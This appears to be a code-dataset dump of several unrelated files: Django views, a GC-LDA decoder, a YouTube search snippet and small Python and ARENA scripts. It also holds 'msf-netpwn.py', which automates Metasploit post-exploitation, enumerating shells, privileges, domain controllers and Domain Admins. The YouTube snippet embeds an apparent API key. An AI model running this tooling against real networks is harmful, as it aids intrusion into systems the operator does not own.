    ')\n\ndef error (request, *args, **kwargs):\n raise Http404('Not working')\n# Create your views here.\ndef qa_new(request):\n last_questions = Question.objects.order_by('id')\n limit = request.GET.get('limit', 10)\n page = request.GET.get('page', 1)\n paginator = Paginator(last_questions, limit)\n paginator.baseurl = '/?page='\n page = paginator.page(page)\n return render(request, 'qa_new.html', {\n 'last_questions': page.object_list,\n 'paginator': paginator,\n 'page': page,\n })\n\ndef qa_popular(request):\n questions = Question.objects.order_by('-rating')\n limit = request.GET.get('limit', 10)\n page = request.GET.get('page')\n paginator = Paginator(questions, limit)\n paginator.baseurl = '/popular/?page='\n page = paginator.page(page)\n return render(request, 'qa_popular.html', {\n 'questions': page.object_list,\n 'paginator': paginator,\n 'page': page,\n })\n\ndef qa_question(request, question_id):\n question = get_object_or_404(Question, id=question_id)\n answers = Answer.objects.filter(question=question_id)\n if request.method is 'POST':\n return answer_form(request)\n form = AnswerForm()\n context = {\n 'title': question.title,\n 'text': question.text,\n 'answers': answers,\n 'rating': question.rating,\n 'from': form,\n }\n return render(request, 'qa_question.html', context)\n", "sub_path": "ask/qa/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1776, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.http.HttpResponse", "line_number": 9, "usage_type": "call"}, {"api_name": "django.shortcuts.Http404", "line_number": 12, "usage_type": "call"}, {"api_name": "models.Question.objects.order_by", "line_number": 15, "usage_type": "call"}, {"api_name": "models.Question.objects", "line_number": 15, "usage_type": "attribute"}, {"api_name": "models.Question", "line_number": 15, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 18, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 21, "usage_type": "call"}, {"api_name": "models.Question.objects.order_by", "line_number": 28, "usage_type": "call"}, {"api_name": "models.Question.objects", "line_number": 28, "usage_type": "attribute"}, {"api_name": "models.Question", "line_number": 28, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 31, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 34, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 41, "usage_type": "call"}, {"api_name": "models.Question", "line_number": 41, "usage_type": "argument"}, {"api_name": "models.Answer.objects.filter", "line_number": 42, "usage_type": "call"}, {"api_name": "models.Answer.objects", "line_number": 42, "usage_type": "attribute"}, {"api_name": "models.Answer", "line_number": 42, "usage_type": "name"}, {"api_name": "forms.AnswerForm", "line_number": 45, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "321796321", "text": "#!/usr/bin/env python3\n\nimport re\nimport os\nimport sys\nimport time\nimport signal\nimport msfrpc\nimport asyncio\nimport argparse\nimport netifaces\nfrom IPython import embed\nfrom termcolor import colored\nfrom netaddr import IPNetwork, AddrFormatError\nfrom subprocess import Popen, PIPE, CalledProcessError\n\nBUSY_SESSIONS = []\n\ndef parse_args():\n # Create the arguments\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-l\", \"--hostlist\", help=\"Host list file\")\n parser.add_argument(\"-p\", \"--password\", default='123', help=\"Password for msfrpc\")\n parser.add_argument(\"-u\", \"--username\", default='msf', help=\"Username for msfrpc\")\n return parser.parse_args()\n\n# Colored terminal output\ndef print_bad(msg):\n print((colored('[-] ', 'red') + msg))\n\ndef print_info(msg):\n print((colored('[*] ', 'blue') + msg))\n\ndef print_good(msg):\n print((colored('[+] ', 'green') + msg))\n\ndef print_great(msg):\n print((colored('[!] {}'.format(msg), 'yellow', attrs=['bold'])))\n\ndef kill_tasks():\n print()\n print_info('Killing tasks then exiting...')\n for task in asyncio.Task.all_tasks():\n task.cancel()\n\ndef get_iface():\n '''\n Gets the right interface for Responder\n '''\n try:\n iface = netifaces.gateways()['default'][netifaces.AF_INET][1]\n except:\n ifaces = []\n for iface in netifaces.interfaces():\n # list of ipv4 addrinfo dicts\n ipv4s = netifaces.ifaddresses(iface).get(netifaces.AF_INET, [])\n\n for entry in ipv4s:\n addr = entry.get('addr')\n if not addr:\n continue\n if not (iface.startswith('lo') or addr.startswith('127.')):\n ifaces.append(iface)\n\n iface = ifaces[0]\n\n return iface\n\ndef get_local_ip(iface):\n '''\n Gets the the local IP of an interface\n '''\n ip = netifaces.ifaddresses(iface)[netifaces.AF_INET][0]['addr']\n return ip\n\nasync def get_shell_info(CLIENT, sess_num):\n sysinfo_cmd = 'sysinfo'\n sysinfo_end_str = b'Meterpreter : '\n\n sysinfo_output = await run_session_cmd(CLIENT, sess_num, sysinfo_cmd, sysinfo_end_str)\n # Catch error\n if type(sysinfo_output) == str:\n return sysinfo_output\n\n else:\n sysinfo_utf8_out = sysinfo_output.decode('utf8')\n sysinfo_split = sysinfo_utf8_out.splitlines()\n\n getuid_cmd = 'getuid'\n getuid_end_str = b'Server username:'\n\n getuid_output = await run_session_cmd(CLIENT, sess_num, getuid_cmd, getuid_end_str)\n # Catch error\n if type(getuid_output) == str:\n return getuid_output\n else:\n getuid_utf8_out = getuid_output.decode('utf8')\n getuid = 'User : '+getuid_utf8_out.split('Server username: ')[-1].strip().strip()\n\n # We won't get here unless there's no errors\n shell_info_list = [getuid] + sysinfo_split\n\n return shell_info_list\n\ndef get_domain(shell_info):\n for l in shell_info:\n l_split = l.split(':')\n if 'Domain ' in l_split[0]:\n if 'WORKGROUP' in l_split[1]:\n return False\n else:\n domain = l_split[-1].strip()\n return domain\n\ndef is_domain_joined(user_info, domain):\n info_split = user_info.split(':')\n dom_and_user = info_split[1].strip()\n dom_and_user_split = dom_and_user.split('\\\\')\n dom = dom_and_user_split[0]\n user = dom_and_user_split[1]\n if domain:\n if dom.lower() in domain.lower():\n return True\n\n return False\n\ndef print_shell_data(shell_info, admin_shell, local_admin, sess_num_str):\n print_info('New shell info')\n for l in shell_info:\n print(' '+l)\n msg = ''' Admin shell : {}\n Local admin : {}\n Session number : {}'''.format( \n admin_shell.decode('utf8'), \n local_admin.decode('utf8'),\n sess_num_str)\n print(msg)\n\nasync def sess_first_check(CLIENT, session, sess_num):\n if b'first_check' not in session:\n print_good('Session {} found, gathering shell info...'.format(str(sess_num)))\n\n # Give meterpeter chance to open\n await asyncio.sleep(2)\n\n sess_num_str = str(sess_num)\n session[b'first_check'] = b'False'\n session[b'session_number'] = sess_num_str.encode()\n\n shell_info = await get_shell_info(CLIENT, sess_num)\n # Catch errors\n if type(shell_info) == str:\n session[b'error'] = shell_info.encode()\n return session\n\n # returns either a string of the domain name or False\n domain = get_domain(shell_info)\n if domain:\n session[b'domain'] = domain.encode()\n\n domain_joined = is_domain_joined(shell_info[0], domain)\n if domain_joined == True:\n session[b'domain_joined'] = b'True'\n else:\n session[b'domain_joined'] = b'False'\n\n admin_shell, local_admin = await is_admin(CLIENT, sess_num)\n # Catch errors\n if type(admin_shell) == str:\n session[b'error'] = admin_shell.encode()\n return session\n\n session[b'admin_shell'] = admin_shell\n session[b'local_admin'] = local_admin\n\n print_shell_data(shell_info, admin_shell, local_admin, sess_num_str)\n\n return session\n\nasync def is_admin(CLIENT, sess_num):\n cmd = 'run post/windows/gather/win_privs'\n\n output = await run_session_cmd(CLIENT, sess_num, cmd, None)\n # Catch error\n if type(output) == str:\n return (output, None)\n\n if output:\n split_out = output.decode('utf8').splitlines()\n user_info_list = split_out[5].split()\n admin_shell = user_info_list[0]\n system = user_info_list[1]\n local_admin = user_info_list[2]\n user = user_info_list[5]\n\n # Byte string\n return (str(admin_shell).encode(), str(local_admin).encode())\n\n else:\n return (b'ERROR', b'ERROR')\n\nasync def get_domain_controller(CLIENT, domain_data, sess_num):\n print_info('Getting domain controller...')\n cmd = 'run post/windows/gather/enum_domains'\n end_str = b'[+] Domain Controller:'\n output = await run_session_cmd(CLIENT, sess_num, cmd, end_str)\n\n # Catch timeout\n if type(output) == str:\n domain_data['err'].append(sess_num)\n return domain_data\n\n output = output.decode('utf8')\n if 'Domain Controller: ' in output:\n dc = output.split('Domain Controller: ')[-1].strip()\n domain_data['domain_controllers'].append(dc)\n print_good('Domain controller: '+dc)\n else:\n print_bad('No domain controller found')\n\n return domain_data\n\nasync def get_domain_admins(CLIENT, domain_data, sess_num):\n print_info('Getting domain admins...')\n cmd = 'run post/windows/gather/enum_domain_group_users GROUP=\"Domain Admins\"'\n end_str = b'[+] User list'\n\n output = await run_session_cmd(CLIENT, sess_num, cmd, end_str)\n # Catch timeout\n if type(output) == str:\n domain_data['err'].append(sess_num)\n return domain_data\n\n output = output.decode('utf8')\n da_line_start = '[*] \\t'\n\n if da_line_start in output:\n split_output = output.splitlines()\n print_info('Domain admins:')\n\n domain_admins = []\n for l in split_output:\n if l.startswith(da_line_start):\n domain_admin = l.split(da_line_start)[-1].strip()\n domain_admins.append(domain_admin)\n print(' '+domain_admin)\n domain_data['domain_admins'] = domain_admins\n\n else:\n print_bad('No domain admins found')\n sys.exit()\n\n return domain_data\n\nasync def get_domain_data(CLIENT, session, sess_num, domain_data):\n # Check if we did domain recon yet\n if domain_data['domain_admins'] == []:\n if session[b'domain_joined'] == b'True':\n domain_data = await get_domain_controller(CLIENT, domain_data, sess_num)\n domain_data = await get_domain_admins(CLIENT, domain_data, sess_num)\n\n return domain_data\n\nasync def attack_with_sessions(CLIENT, sessions, domain_data):\n\n if len(sessions) > 0:\n\n for s in sessions:\n\n # Get and print session info if first time we've checked the session\n sessions[s] = await sess_first_check(CLIENT, sessions[s], s)\n \n # Update domain data\n if b'domain' in sessions[s]:\n domain_data['domains'].append(sessions[s][b'domain'])\n\n if domain_data['domain_admins'] == []:\n domain_data = await get_domain_data(CLIENT, sessions[s], s, domain_data)\n\n return (sessions, domain_data)\n\ndef get_output(CLIENT, cmd, sess_num):\n output = CLIENT.call('session.meterpreter_read', [str(sess_num)])\n\n # Everythings fine\n if b'data' in output:\n return output[b'data']\n\n # Got an error from the CLIENT.call\n elif b'error_message' in output:\n decoded_err = output[b'error_message'].decode('utf8')\n print_bad(error_msg.format(sess_num_str, decoded_err))\n return decoded_err\n\n # Some other error catchall\n else:\n return cmd\n\ndef get_output_errors(output, counter, cmd, sess_num, timeout, sleep_secs):\n script_errors = [b'[-] post failed', \n b'error in script', \n b'operation failed', \n b'unknown command', \n b'operation timed out']\n\n # Got an error from output\n if any(x in output.lower() for x in script_errors):\n print_bad(('Command [{}] in session {} '\n 'failed with error: {}'\n ).format(cmd, str(sess_num), output.decode('utf8')))\n return cmd, counter\n\n # If no terminating string specified just wait til timeout\n if output == b'':\n counter += sleep_secs\n if counter > timeout:\n print_bad('Command [{}] in session {} timed out'.format(cmd, str(sess_num)))\n return 'timed out', counter\n\n # No output but we haven't reached timeout yet\n return output, counter\n\nasync def run_session_cmd(CLIENT, sess_num, cmd, end_str, timeout=30):\n ''' Will only return a str if we failed to run a cmd'''\n global BUSY_SESSIONS\n\n error_msg = 'Error in session {}: {}'\n sess_num_str = str(sess_num)\n\n print_info('Running [{}] on session {}'.format(cmd, str(sess_num)))\n\n while sess_num in BUSY_SESSIONS:\n await asyncio.sleep(.1)\n\n BUSY_SESSIONS.append(sess_num)\n\n res = CLIENT.call('session.meterpreter_run_single', [str(sess_num), cmd])\n\n if b'error_message' in res:\n err_msg = res[b'error_message'].decode('utf8')\n print_bad(error_msg.format(sess_num_str, err_msg))\n return err_msg\n\n elif res[b'result'] == b'success':\n\n counter = 0\n sleep_secs = 0.5\n\n try:\n while True:\n await asyncio.sleep(sleep_secs)\n\n output = get_output(CLIENT, cmd, sess_num)\n # Error from meterpreter console\n if type(output) == str:\n BUSY_SESSIONS.remove(sess_num)\n return output\n\n # Successfully completed\n if end_str:\n if end_str in output:\n BUSY_SESSIONS.remove(sess_num)\n return output\n # If no end_str specified just return once we have any data\n else:\n if len(output) > 0:\n BUSY_SESSIONS.remove(sess_num)\n return output\n\n # Check for errors from cmd's output\n output, counter = get_output_errors(output, counter, cmd, sess_num, timeout, sleep_secs)\n # Error from cmd output including timeout\n if type(output) == str:\n BUSY_SESSIONS.remove(sess_num)\n return output\n\n # This usually occurs when the session suddenly dies or user quits it\n except Exception as e:\n err = 'exception below likely due to abrupt death of session'\n print_bad(error_msg.format(sess_num_str, err))\n print_bad(' '+str(e))\n BUSY_SESSIONS.remove(sess_num)\n return err\n\n # b'result' not in res, b'error_message' not in res, just catch everything else as an error\n else:\n print_bad(res[b'result'].decode('utf8'))\n BUSY_SESSIONS.remove(sess_num)\n return cmd\n \ndef get_perm_token(CLIENT):\n # Authenticate and grab a permanent token\n CLIENT.login(args.username, args.password)\n CLIENT.call('auth.token_add', ['123'])\n CLIENT.token = '123'\n return CLIENT\n\ndef filter_broken_sessions(updated_sessions):\n ''' We remove 2 kinds of errored sessions: 1) timed out on sysinfo 2) shell died abruptly '''\n unbroken_sessions = {}\n\n for s in updated_sessions:\n if b'error' in updated_sessions[s]:\n # Session timed out on initial sysinfo cmd\n if b'domain' not in updated_sessions[s]:\n continue\n # Session abruptly died\n elif updated_sessions[s][b'error'] == b'exception below likely due to abrupt death of session':\n continue\n\n unbroken_sessions[s] = updated_sessions[s]\n\n return unbroken_sessions\n\ndef update_sessions(sessions, updated_sessions):\n ''' Four keys added after we process a new session: \n first_check, domain_joined, local_admin, admin_shell \n This function does not overwrite data from MSF\n it only adds previously known data to the MSF session'''\n if updated_sessions:\n udpated_sessions = filter_broken_sessions(updated_sessions)\n\n # s = session number, sessions[s] = session data dict\n for s in sessions:\n if s in updated_sessions:\n for k in updated_sessions[s]:\n if k not in sessions[s]:\n sessions[s][k] = updated_sessions[s].get(k)\n\n return sessions\n\nasync def check_for_sessions(CLIENT):\n domain_data = {'domains':[], \n 'domain_controllers':[], \n 'domain_admins':[], \n 'err':[]}\n updated_sessions = None\n print_info('Waiting for Meterpreter shell')\n\n while True:\n\n # Get list of MSF sessions from RPC server\n sessions = CLIENT.call('session.list')\n\n # Update the session info dict with previously found information\n sessions = update_sessions(sessions, updated_sessions)\n\n # Do stuff with the sessions\n updated_sessions, domain_data = await attack_with_sessions(CLIENT, sessions, domain_data)\n \n await asyncio.sleep(10)\n\ndef main(args):\n\n CLIENT = msfrpc.Msfrpc({})\n CLIENT = get_perm_token(CLIENT)\n\n loop = asyncio.get_event_loop()\n loop.add_signal_handler(signal.SIGINT, kill_tasks)\n task = asyncio.ensure_future(check_for_sessions(CLIENT))\n try:\n loop.run_until_complete(task)\n except asyncio.CancelledError:\n print_info('Tasks gracefully downed a cyanide pill before defecating themselves and collapsing in a twitchy pile')\n finally:\n loop.close()\n\nif __name__ == \"__main__\":\n args = parse_args()\n if os.geteuid():\n print_bad('Run as root')\n sys.exit()\n main(args)\n\n", "sub_path": "msf-netpwn.py", "file_name": "msf-netpwn.py", "file_ext": "py", "file_size_in_byte": 15336, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 21, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 29, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 32, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 35, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 38, "usage_type": "call"}, {"api_name": "asyncio.Task.all_tasks", "line_number": 43, "usage_type": "call"}, {"api_name": "asyncio.Task", "line_number": 43, "usage_type": "attribute"}, {"api_name": "netifaces.gateways", "line_number": 51, "usage_type": "call"}, {"api_name": "netifaces.AF_INET", "line_number": 51, "usage_type": "attribute"}, {"api_name": "netifaces.interfaces", "line_number": 54, "usage_type": "call"}, {"api_name": "netifaces.ifaddresses", "line_number": 56, "usage_type": "call"}, {"api_name": "netifaces.AF_INET", "line_number": 56, "usage_type": "attribute"}, {"api_name": "netifaces.ifaddresses", "line_number": 73, "usage_type": "call"}, {"api_name": "netifaces.AF_INET", "line_number": 73, "usage_type": "attribute"}, {"api_name": "asyncio.sleep", "line_number": 144, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 251, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 333, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 351, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 451, "usage_type": "call"}, {"api_name": "msfrpc.Msfrpc", "line_number": 455, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 458, "usage_type": "call"}, {"api_name": "signal.SIGINT", "line_number": 459, "usage_type": "attribute"}, {"api_name": "asyncio.ensure_future", "line_number": 460, "usage_type": "call"}, {"api_name": "asyncio.CancelledError", "line_number": 463, "usage_type": "attribute"}, {"api_name": "os.geteuid", "line_number": 470, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 472, "usage_type": "call"}]} +{"seq_id": "598225079", "text": "# emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n\"\"\"\nClass and functions for functional decoding.\n\"\"\"\nfrom __future__ import print_function, division\n\nfrom builtins import object\nimport numpy as np\nimport pandas as pd\nimport nibabel as nib\nfrom nilearn.masking import apply_mask, unmask\nfrom sklearn.feature_extraction.text import CountVectorizer\n\nfrom .due import due, Doi\n\n\n@due.dcite(Doi('10.1371/journal.pcbi.1005649'),\n description='Describes decoding methods using GC-LDA.')\nclass Decoder(object):\n \"\"\"\n Class object for a gcLDA decoder\n \"\"\"\n def __init__(self, model):\n \"\"\"\n Class object for a gcLDA decoder\n \"\"\"\n self.model = model\n self.dataset = model.dataset\n\n def decode_roi(self, roi, topic_priors=None):\n \"\"\"\n Perform image-to-text decoding for discrete image inputs (e.g., regions\n of interest, significant clusters).\n\n 1. Compute p_topic_g_voxel.\n - I think you need p_voxel_g_topic for this, then you do:\n - p_topic_g_voxel = p_voxel_g_topic * p_topic / p_voxel\n - What is p_voxel here?\n 2. Compute topic weight vector (tau_t).\n - topic_weights = np.sum(p_topic_g_voxel, axis=1) (across voxels)\n 3. Multiply tau_t by topic-by-word matrix (p_word_g_topic).\n 4. The resulting vector (tau_t*p_word_g_topic) should be word weights\n for your selected studies.\n \"\"\"\n if type(roi) == str:\n roi = nib.load(roi)\n\n if not np.array_equal(roi.affine, self.model.dataset.mask_img.affine):\n str1 = np.array2string(roi.affine)\n str2 = np.array2string(self.model.dataset.mask_img.affine)\n raise ValueError('Input roi must have same affine as mask img:'\n '\\n{0}\\n{1}'.format(str1, str2))\n\n # Load ROI file and get ROI voxels overlapping with brain mask\n roi_arr = roi.get_data() & self.model.dataset.mask_img.get_data()\n roi_voxels = np.where(roi_arr > 0)[0]\n\n p_topic_g_voxel, _ = self.model.get_spatial_probs()\n p_topic_g_roi = p_topic_g_voxel[roi_voxels, :] # p(T|V) for voxels in ROI only\n topic_weights = np.sum(p_topic_g_roi, axis=0) # Sum across words\n if topic_priors is not None:\n topic_weights *= topic_priors\n topic_weights /= np.sum(topic_weights) # tau_t\n\n # Multiply topic_weights by topic-by-word matrix (p_word_g_topic).\n n_word_tokens_per_topic = np.sum(self.model.n_word_tokens_word_by_topic, axis=0)\n p_word_g_topic = self.model.n_word_tokens_word_by_topic / n_word_tokens_per_topic[None, :]\n p_word_g_topic = np.nan_to_num(p_word_g_topic, 0)\n word_weights = np.dot(p_word_g_topic, topic_weights)\n\n decoded_df = pd.DataFrame(index=self.model.dataset.word_labels, columns=['Weight'],\n data=word_weights)\n decoded_df.index.name = 'Term'\n return decoded_df, topic_weights\n\n def decode_continuous(self, image, topic_priors=None):\n \"\"\"\n Perform image-to-text decoding for continuous inputs (e.g.,\n unthresholded statistical maps).\n\n 1. Compute p_topic_g_voxel.\n 2. Compute topic weight vector (tau_t) by multiplying p_topic_g_voxel\n by input image.\n 3. Multiply tau_t by topic-by-word matrix (p_word_g_topic).\n 4. The resulting vector (tau_t*p_word_g_topic) should be word weights\n for your map, but the values are scaled based on the input image, so\n they won't necessarily mean much.\n \"\"\"\n # Load image file and get voxel values\n input_values = apply_mask(image, self.model.dataset.mask_img)\n p_topic_g_voxel, _ = self.model.get_spatial_probs()\n topic_weights = np.abs(np.squeeze(np.dot(p_topic_g_voxel.T, input_values[:, None])))\n if topic_priors is not None:\n topic_weights *= topic_priors\n topic_weights /= np.sum(topic_weights) # tau_t\n\n # Multiply topic_weights by topic-by-word matrix (p_word_g_topic).\n n_word_tokens_per_topic = np.sum(self.model.n_word_tokens_word_by_topic, axis=0)\n p_word_g_topic = self.model.n_word_tokens_word_by_topic / n_word_tokens_per_topic[None, :]\n p_word_g_topic = np.nan_to_num(p_word_g_topic, 0)\n word_weights = np.dot(p_word_g_topic, topic_weights)\n\n decoded_df = pd.DataFrame(index=self.model.dataset.word_labels, columns=['Weight'],\n data=word_weights)\n decoded_df.index.name = 'Term'\n return decoded_df, topic_weights\n\n def encode(self, text, out_file=None, topic_priors=None):\n \"\"\"\n Perform text-to-image encoding.\n\n 1. Compute p_topic_g_word.\n - p_topic_g_word = p_word_g_topic * p_topic / p_word\n - p_topic is uniform (1/n topics)\n 2. Compute topic weight vector (tau_t).\n - tau_t = np.sum(p_topic_g_word, axis=1) (across words)\n 3. Multiply tau_t by topic-by-voxel matrix of smoothed p_voxel_g_topic\n (A; not sure where it is, but I don't think it's the same as A in\n model.py).\n 4. The resulting map (tau_t*A) is the encoded image. Values are *not*\n probabilities.\n \"\"\"\n if isinstance(text, list):\n text = ' '.join(text)\n\n # Assume that words in word_labels are underscore-separated.\n # Convert to space-separation for vectorization of input string.\n vocabulary = [term.replace('_', ' ') for term in self.model.dataset.word_labels]\n max_len = max([len(term.split(' ')) for term in vocabulary])\n vectorizer = CountVectorizer(vocabulary=self.model.dataset.word_labels,\n ngram_range=(1, max_len))\n word_counts = np.squeeze(vectorizer.fit_transform([text]).toarray())\n keep_idx = np.where(word_counts > 0)[0]\n text_counts = word_counts[keep_idx]\n\n n_topics_per_word_token = np.sum(self.model.n_word_tokens_word_by_topic, axis=1)\n p_topic_g_word = self.model.n_word_tokens_word_by_topic / n_topics_per_word_token[:, None]\n p_topic_g_word = np.nan_to_num(p_topic_g_word, 0)\n p_topic_g_text = p_topic_g_word[keep_idx] # p(T|W) for words in text only\n prod = p_topic_g_text * text_counts[:, None] # Multiply p(T|W) by words in text\n topic_weights = np.sum(prod, axis=0) # Sum across words\n if topic_priors is not None:\n topic_weights *= topic_priors\n topic_weights /= np.sum(topic_weights) # tau_t\n\n _, p_voxel_g_topic = self.model.get_spatial_probs()\n voxel_weights = np.dot(p_voxel_g_topic, topic_weights)\n voxel_weights_matrix = unmask(voxel_weights, self.model.dataset.mask_img)\n\n img = nib.Nifti1Image(voxel_weights_matrix, self.model.dataset.mask_img.affine)\n if out_file is not None:\n img.to_filename(out_file)\n return img, topic_weights\n", "sub_path": "gclda/decode.py", "file_name": "decode.py", "file_ext": "py", "file_size_in_byte": 7117, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "builtins.object", "line_number": 20, "usage_type": "name"}, {"api_name": "nibabel.load", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.array_equal", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.array2string", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.array2string", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.nan_to_num", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 70, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 72, "usage_type": "call"}, {"api_name": "nilearn.masking.apply_mask", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.nan_to_num", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 102, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 104, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.CountVectorizer", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.nan_to_num", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 148, "usage_type": "call"}, {"api_name": "nilearn.masking.unmask", "line_number": 149, "usage_type": "call"}, {"api_name": "nibabel.Nifti1Image", "line_number": 151, "usage_type": "call"}, {"api_name": "due.due.dcite", "line_number": 18, "usage_type": "call"}, {"api_name": "due.due", "line_number": 18, "usage_type": "name"}, {"api_name": "due.Doi", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "148249861", "text": "from apiclient.discovery import build\n\n\nDEVELOPER_KEY = \"AIzaSyDngQv_cVeUuk1LMrqwvP0M-8s6XfgqpGs\"\nYOUTUBE_API_SERVICE_NAME = \"youtube\"\nYOUTUBE_API_VERSION = \"v3\"\nyoutube = build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION, developerKey=DEVELOPER_KEY)\nsearch_response = youtube.search().list(\n q='asmr 귀',\n part=\"id,snippet\",\n maxResults=25\n ).execute()\n\nprint(search_response)", "sub_path": "startone.py", "file_name": "startone.py", "file_ext": "py", "file_size_in_byte": 391, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "apiclient.discovery.build", "line_number": 7, "usage_type": "call"}]} +{"seq_id": "179958025", "text": "import multiprocessing\r\n\r\ndef myProcFn():\r\n print('Executing child process (with its own GIL)')\r\n\r\ndef main():\r\n print('Executign the main process')\r\n myProc2 = multiprocessing.Process(target=myProcFn)\r\n myProc2.start()\r\n myProc2.join()\r\n print('child process has terminated')\r\n\r\nif __name__ == '__main__':\r\n main()", "sub_path": "data/beyondAdvancedPythonApril2021-main/using_processes/p1_proc_fn.py", "file_name": "p1_proc_fn.py", "file_ext": "py", "file_size_in_byte": 336, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "multiprocessing.Process", "line_number": 8, "usage_type": "call"}]} +{"seq_id": "289374951", "text": "import numpy as np\nfrom matplotlib import pyplot as plt\n\ndef genDataSet(N):\n x = np.random.normal(0, 1, N)\n ytrue = (np.cos(x) + 2) / (np.cos(x * 1.4) + 2)\n noise = np.random.normal(0, 0.2, N)\n y = ytrue + noise\n return x, y, ytrue\n\nx, y, ytrue = genDataSet(100)\nplt.plot(x,y,'.')\nplt.plot(x,ytrue,'rx')\nplt.show()\n", "sub_path": "mulligan-03/hw3_1_a_gendata.py", "file_name": "hw3_1_a_gendata.py", "file_ext": "py", "file_size_in_byte": 330, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.random.normal", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 5, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 7, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}]} +{"seq_id": "522957404", "text": "import serial\nimport time\nimport json\nimport random\nimport arena\nfrom threading import Thread\nfrom utils import send_alert2\n\n# Global for keeping track of which sensor to display data from\n\ntest_email = True\n\n\n\n\nemail_status= False\n\nif test_email and email_status==False:\n send_alert2()\n email_status=True\n\ndef start_serial():\n global sensor_to_read\n global reading_text\n\n\n\n global email_status \n# global test_email\n global door_status\n\n # set up the serial line\n ser = serial.Serial('COM4', 9600)\n time.sleep(2)\n \n \n while True:\n if email_status and door_status == True:\n ser.write(\"blink\\n\".encode())\n \n elif email_status and door_status == False:\n ser.write(\"dont blink\\n\".encode())\n time.sleep(1)\n\n ser.close()\n\n\ndef scene_callback(msg):\n print(\"scene_callback: \", msg)\n\narena.init(\"arena.andrew.cmu.edu\", \"realm\", \"patrick_scene\")#, scene_callback)\n\n\n\n\ndoor_status = False\ndef door_button_callback(event):\n global door_obj\n global door_status\n if event.event_type == arena.EventType.mousedown:\n if door_status:\n door_status = False\n door_obj.update(data='{\"animation\": { \"property\": \"rotation\", \"from\": \"0 90 0\", \"to\": \"0 0 0\", \"loop\": false, \"dur\": 1000}}')\n else:\n door_status = True\n door_obj.update(data='{\"animation\": { \"property\": \"rotation\",\"from\": \"0 0 0\", \"to\": \"0 90 0 \", \"loop\": false, \"dur\": 1000}}')\ndoor_obj = arena.Object(\n objName = \"door\",\n objType=arena.Shape.cube,\n scale=(0.1,2,1.2),\n location=(-9,1.6,-2),\n 